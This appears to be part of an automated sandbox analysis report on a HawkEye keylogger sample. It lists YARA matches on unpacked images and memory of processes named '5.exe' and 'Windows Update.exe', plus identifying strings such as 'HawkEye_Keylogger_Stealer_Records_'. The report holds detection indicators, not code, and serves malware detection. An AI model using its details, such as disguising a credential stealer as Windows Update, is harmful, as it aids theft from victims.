          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.32.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.46.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.34.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.53.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a07e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a57e0d.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.35.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae9c0d.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a97e0d.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4b3fa72.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.47.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.52.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.415058.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a06428.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b1458.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c3258.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.50.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a57e0d.29.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a56408.54.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a90000.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a50000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4aadc72.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3863258.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.20.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.17.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.23.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.415058.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38cb065.24.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.415058.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49cf428.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4b3fa72.36.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b7fa72.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.386b065.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a50000.30.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4aedc72.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c3258.25.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.3869660.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.33.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49d0e2d.49.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41ce65.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.38c9660.45.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b1458.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4a26c92.27.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae9c0d.57.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.15.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.5.exe.148a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38cb065.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41b460.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.16.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.19.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4aadc72.31.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae0000.16.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.49d0e2d.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.41b460.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.41ce65.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae0000.55.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.11.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4b20000.15.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.1.Windows Update.exe.415058.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.4ae8208.58.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4ae8208.18.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.5.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Windows Update.exe.147b7860.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.4a56408.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.41.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.38c9660.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.49cf428.48.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.415058.12.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.4a96408.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.400000.40.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.5.exe.41b460.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.41ce65.42.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.5.exe.41ce65.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.Windows Update.exe.28e9124.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.28e9124.22.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.Windows Update.exe.28e9124.43.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.380004808.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.304487124.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405506520.0000000004A60000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347861832.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.342960514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000001.382890581.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.385835641.00000000148A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.264178503.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.415513797.0000000005980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.403603972.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.405826731.0000000004AF2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354086435.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.347403279.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.265043161.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.389248148.0000000004A50000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.354358583.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.400775049.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000001.307043885.0000000000414000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000000.378693184.0000000000414000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.353925179.00000000049C9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.348180728.0000000004AE2000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.382308490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1928, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: 5.exe PID: 1060, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 5844, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 6244, type: MEMORYSTR
          Detected HawkEye RatShow sources
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: 5.exeString found in binary or memory: HawkEyeKeylogger
          Source: 5.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
          Source: 5.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
          Source: 5.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: 5.exe, 00000002.00000002.291232950.00000000028D2000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exeString found in binary or memory: HawkEyeKeylogger
          Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
          Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Stealer_Records_
          Source: Windows Update.exeString found in binary or memory: HawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: (r'&HawkEye_Keylogger_Execution_Confirmed_
          Source: Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: (r#"HawkEye_Keylogger_Stealer_Records_
          Source: Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: (r'&HawkEye_Keylogger_Execution_Confirmed_
          Source: Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: (r#"HawkEye_Keylogger_Stealer_Records_
          Source: Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: (r'&HawkEye_Keylogger_Execution_Confirmed_
          Source: Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmpString found in binary or memory: (r#"HawkEye_Keylogger_Stealer_Records_
          Source: Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
          Source: Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmpString found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
          Source: Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmpString found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
          Source: Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmpString found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
          Source: Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmpString found in binary or memory: \pidloc.txt!HawkEyeKeylogger
